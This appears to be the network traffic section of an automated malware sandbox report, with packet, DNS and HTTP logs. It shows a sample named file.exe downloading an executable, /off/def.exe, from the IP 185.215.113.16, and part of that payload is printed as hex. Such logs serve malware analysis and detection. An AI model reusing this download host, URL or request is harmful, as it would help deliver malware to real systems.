                                                                                                                                                                                              Nov 24, 2024 13:41:04.832161903 CET4435003213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:04.832232952 CET4435003213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:04.832386017 CET50032443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:04.832386017 CET50032443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:04.832412004 CET50032443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:04.832426071 CET4435003213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:04.832454920 CET50035443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:04.832478046 CET4435003513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:04.832920074 CET50035443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:04.832927942 CET4435003513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:04.835994005 CET50037443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:04.836028099 CET4435003713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:04.836091995 CET50037443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:04.836211920 CET50037443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:04.836224079 CET4435003713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:05.075946093 CET4435003313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:05.076020956 CET4435003313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:05.076072931 CET50033443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:05.076384068 CET50033443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:05.076405048 CET4435003313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:05.076421022 CET50033443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:05.076426983 CET4435003313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:05.081526995 CET50038443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:05.081578970 CET4435003813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:05.081639051 CET50038443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:05.081877947 CET50038443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:05.081895113 CET4435003813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:05.247091055 CET4435003613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:05.247112036 CET4435003613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:05.247164965 CET50036443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:05.247194052 CET4435003613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:05.251089096 CET4435003613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:05.253977060 CET50036443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:05.255211115 CET50036443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:05.255232096 CET4435003613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:05.255244017 CET50036443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:05.255251884 CET4435003613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:05.258713961 CET50039443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:05.258758068 CET4435003913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:05.258838892 CET50039443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:05.259002924 CET50039443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:05.259016991 CET4435003913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:05.276954889 CET4435003513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:05.276987076 CET4435003513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:05.277079105 CET50035443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:05.277095079 CET4435003513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:05.277291059 CET50035443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:05.277307987 CET4435003513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:05.277394056 CET50035443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:05.277499914 CET4435003513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:05.277525902 CET4435003513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:05.277956009 CET50035443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:05.278592110 CET4435003413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:05.278614998 CET4435003413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:05.278659105 CET50034443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:05.278686047 CET4435003413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:05.281425953 CET4435003413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:05.281476974 CET50034443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:05.286710978 CET50034443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:05.286725998 CET4435003413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:05.286736012 CET50034443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:05.286741972 CET4435003413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:05.298902035 CET50040443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:05.298942089 CET4435004013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:05.301975965 CET50040443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:05.302115917 CET50040443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:05.302125931 CET4435004013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:05.308629036 CET50041443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:05.308691978 CET4435004113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:05.308748960 CET50041443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:05.309089899 CET50041443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:05.309109926 CET4435004113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:06.712620020 CET4435003713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:06.713195086 CET50037443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:06.713212967 CET4435003713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:06.713731050 CET50037443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:06.713736057 CET4435003713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:06.997415066 CET4435003813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:06.997977972 CET50038443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:06.998016119 CET4435003813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:06.998605013 CET50038443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:06.998611927 CET4435003813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:07.042051077 CET4435003913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:07.042582035 CET50039443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:07.042598963 CET4435003913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:07.043061972 CET50039443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:07.043066025 CET4435003913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:07.075259924 CET4435004113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:07.075815916 CET50041443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:07.075913906 CET4435004113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:07.076216936 CET50041443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:07.076231956 CET4435004113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:07.128202915 CET4435004013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:07.128599882 CET50040443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:07.128622055 CET4435004013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:07.128997087 CET50040443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:07.129003048 CET4435004013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:07.165304899 CET4435003713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:07.165374041 CET4435003713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:07.165529966 CET4435003713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:07.165626049 CET50037443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:07.165626049 CET50037443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:07.165654898 CET50037443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:07.165654898 CET50037443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:07.165669918 CET4435003713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:07.165679932 CET4435003713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:07.168450117 CET50042443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:07.168498039 CET4435004213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:07.168765068 CET50042443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:07.168879032 CET50042443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:07.168890953 CET4435004213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:07.478262901 CET4435003913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:07.478316069 CET4435003913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:07.478581905 CET50039443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:07.479121923 CET50039443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:07.479121923 CET50039443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:07.479132891 CET4435003913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:07.479140043 CET4435003913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:07.479887009 CET4435003813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:07.479950905 CET4435003813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:07.480006933 CET50038443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:07.480609894 CET50038443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:07.480631113 CET4435003813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:07.480644941 CET50038443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:07.480650902 CET4435003813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:07.483536005 CET50043443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:07.483589888 CET4435004313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:07.483669996 CET50043443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:07.484091043 CET50043443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:07.484117985 CET4435004313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:07.485312939 CET50044443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:07.485347033 CET4435004413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:07.485960007 CET50044443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:07.486083031 CET50044443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:07.486097097 CET4435004413.107.246.63192.168.2.6
                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                              Nov 24, 2024 13:39:02.511698008 CET5353553192.168.2.61.1.1.1
                                                                                                                                                                                              Nov 24, 2024 13:39:02.753869057 CET53535351.1.1.1192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:39.289083958 CET53628021.1.1.1192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:39.379525900 CET53505341.1.1.1192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:42.344763041 CET53554991.1.1.1192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:43.619693995 CET6528853192.168.2.61.1.1.1
                                                                                                                                                                                              Nov 24, 2024 13:39:43.619865894 CET5411453192.168.2.61.1.1.1
                                                                                                                                                                                              Nov 24, 2024 13:39:43.757742882 CET53541141.1.1.1192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:43.757945061 CET53652881.1.1.1192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:45.953344107 CET6024553192.168.2.61.1.1.1
                                                                                                                                                                                              Nov 24, 2024 13:39:45.953471899 CET4987553192.168.2.61.1.1.1
                                                                                                                                                                                              Nov 24, 2024 13:39:54.703797102 CET53523191.1.1.1192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:57.205667973 CET6279653192.168.2.61.1.1.1
                                                                                                                                                                                              Nov 24, 2024 13:39:57.205816984 CET4961253192.168.2.61.1.1.1
                                                                                                                                                                                              Nov 24, 2024 13:39:59.288106918 CET53528711.1.1.1192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:18.275890112 CET53525941.1.1.1192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:39.048871040 CET53572141.1.1.1192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:41.016617060 CET53505261.1.1.1192.168.2.6
                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                              Nov 24, 2024 13:39:02.511698008 CET192.168.2.61.1.1.10x4a3eStandard query (0)property-imper.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 24, 2024 13:39:43.619693995 CET192.168.2.61.1.1.10x3749Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 24, 2024 13:39:43.619865894 CET192.168.2.61.1.1.10xf225Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                              Nov 24, 2024 13:39:45.953344107 CET192.168.2.61.1.1.10x3df3Standard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 24, 2024 13:39:45.953471899 CET192.168.2.61.1.1.10x9962Standard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                                              Nov 24, 2024 13:39:57.205667973 CET192.168.2.61.1.1.10x93fcStandard query (0)mdec.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 24, 2024 13:39:57.205816984 CET192.168.2.61.1.1.10x9a39Standard query (0)mdec.nelreports.net65IN (0x0001)false
                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                              Nov 24, 2024 13:39:02.753869057 CET1.1.1.1192.168.2.60x4a3eNo error (0)property-imper.sbs104.21.33.116A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 24, 2024 13:39:02.753869057 CET1.1.1.1192.168.2.60x4a3eNo error (0)property-imper.sbs172.67.162.84A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 24, 2024 13:39:43.757742882 CET1.1.1.1192.168.2.60xf225No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                              Nov 24, 2024 13:39:43.757945061 CET1.1.1.1192.168.2.60x3749No error (0)www.google.com142.250.181.100A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 24, 2024 13:39:46.095496893 CET1.1.1.1192.168.2.60xf5bdNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 24, 2024 13:39:46.095496893 CET1.1.1.1192.168.2.60xf5bdNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 24, 2024 13:39:46.095496893 CET1.1.1.1192.168.2.60xf5bdNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 24, 2024 13:39:46.095841885 CET1.1.1.1192.168.2.60x9962No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 24, 2024 13:39:46.095841885 CET1.1.1.1192.168.2.60x9962No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 24, 2024 13:39:46.095874071 CET1.1.1.1192.168.2.60x3d24No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 24, 2024 13:39:46.095920086 CET1.1.1.1192.168.2.60x3df3No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 24, 2024 13:39:46.095920086 CET1.1.1.1192.168.2.60x3df3No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 24, 2024 13:39:46.095920086 CET1.1.1.1192.168.2.60x3df3No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 24, 2024 13:39:46.095920086 CET1.1.1.1192.168.2.60x3df3No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 24, 2024 13:39:48.910264969 CET1.1.1.1192.168.2.60xeb77No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 24, 2024 13:39:48.910612106 CET1.1.1.1192.168.2.60x35b2No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 24, 2024 13:39:48.910612106 CET1.1.1.1192.168.2.60x35b2No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 24, 2024 13:39:48.910612106 CET1.1.1.1192.168.2.60x35b2No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                              Nov 24, 2024 13:39:57.617290974 CET1.1.1.1192.168.2.60x9a39No error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              Nov 24, 2024 13:39:57.629527092 CET1.1.1.1192.168.2.60x93fcNo error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                              • property-imper.sbs
                                                                                                                                                                                              • otelrules.azureedge.net
                                                                                                                                                                                              • slscr.update.microsoft.com
                                                                                                                                                                                              • fs.microsoft.com
                                                                                                                                                                                              • https:
                                                                                                                                                                                                • js.monitor.azure.com
                                                                                                                                                                                                • wcpstatic.microsoft.com
                                                                                                                                                                                              • 185.215.113.16
                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              0192.168.2.649752185.215.113.16805044C:\Users\user\Desktop\file.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              Nov 24, 2024 13:39:25.438653946 CET200OUTGET /off/def.exe HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                              Host: 185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:26.918443918 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:26 GMT
                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                              Content-Length: 2814976
                                                                                                                                                                                              Last-Modified: Sun, 24 Nov 2024 12:33:16 GMT
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              ETag: "67431d0c-2af400"
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 45 cc 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                              Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$`+ `@ +E+`Ui` @ @.rsrc`2@.idata 8@tcknjbhw**:@pazbjnlm @+*@.taggant@`+"*@
                                                                                                                                                                                              Nov 24, 2024 13:39:26.918494940 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Nov 24, 2024 13:39:26.918513060 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Nov 24, 2024 13:39:26.918550014 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Nov 24, 2024 13:39:26.918576002 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Nov 24, 2024 13:39:26.918592930 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Nov 24, 2024 13:39:26.918617964 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                              Nov 24, 2024 13:39:26.918636084 CET1000INData Raw: e5 66 6b fd bc 43 68 36 46 32 6a be 36 e8 87 4c ea ff 7d 5c a3 1d 8e 9c 79 78 ac 3f 0c fd 1c 2a 9e ea b6 d8 0f db dd 1c ee b3 a7 46 1f 21 f8 3c 53 79 48 4c 97 6c 6f 80 44 1b 65 82 54 71 33 2b 5f 64 58 fc bc 6f 54 e4 a8 88 4b 86 3a 82 65 ad 87 cb
                                                                                                                                                                                              Data Ascii: fkCh6F2j6L}\yx?*F!<SyHLloDeTq3+_dXoTK:eUY|s<OIZ\+j#>gm:QfX/b]80;Y-3goyzab]P;pn63Q4Tt&ZL[L*`<_0YiRd$.?ds/C\Z[n1`bbxFi:b+d&a
                                                                                                                                                                                              Nov 24, 2024 13:39:26.918652058 CET1236INData Raw: aa 66 e3 e0 60 95 84 0e bf 57 64 ba 5f 35 67 2c 7a 1e 4e 13 bd 2e a2 b2 65 8b 9e 34 4f 33 f3 1c 09 62 5f c4 41 a4 18 f7 d8 f9 bc 7e 9b 9d a7 20 a6 b0 53 e4 7a a7 f0 16 6d 23 2b 55 44 03 d6 20 d3 8b 3d 2c a9 7f 65 bc e6 f3 c8 ec 87 60 85 36 79 22
                                                                                                                                                                                              Data Ascii: f`Wd_5g,zN.e4O3b_A~ Szm#+UD =,e`6y"*(<_3FW34A?8&#<O3jo/f5S<(@f'3pTFgG3beRo8Ho6?~ds4?sjr:?g4r&g9U@iopRb':(B<g<:gV6gRgF
                                                                                                                                                                                              Nov 24, 2024 13:39:26.918670893 CET1236INData Raw: 03 66 29 eb a0 45 ee 5f 3b ee 9e a9 9f e4 b8 5f 3d ee 86 39 c7 ac ad e0 3a 28 8f 13 4b 4d d3 32 ee cf fc 16 d9 e1 5f 32 93 cc f3 a0 99 6a f4 33 d0 40 ac de 67 07 3d 07 87 84 86 d8 48 21 f6 13 84 4f 57 27 bf 67 87 df 92 3a 86 9e 9f 6d 86 c6 7d b9
                                                                                                                                                                                              Data Ascii: f)E_;_=9:(KM2_2j3@g=H!OW'g:m}"l/{*'vQ?DS@tVA*~^52n8L1=t}"5PM`T- uU!0d2b&(1Rk/a-byg+Fw-)XPR" hlRBt$["R
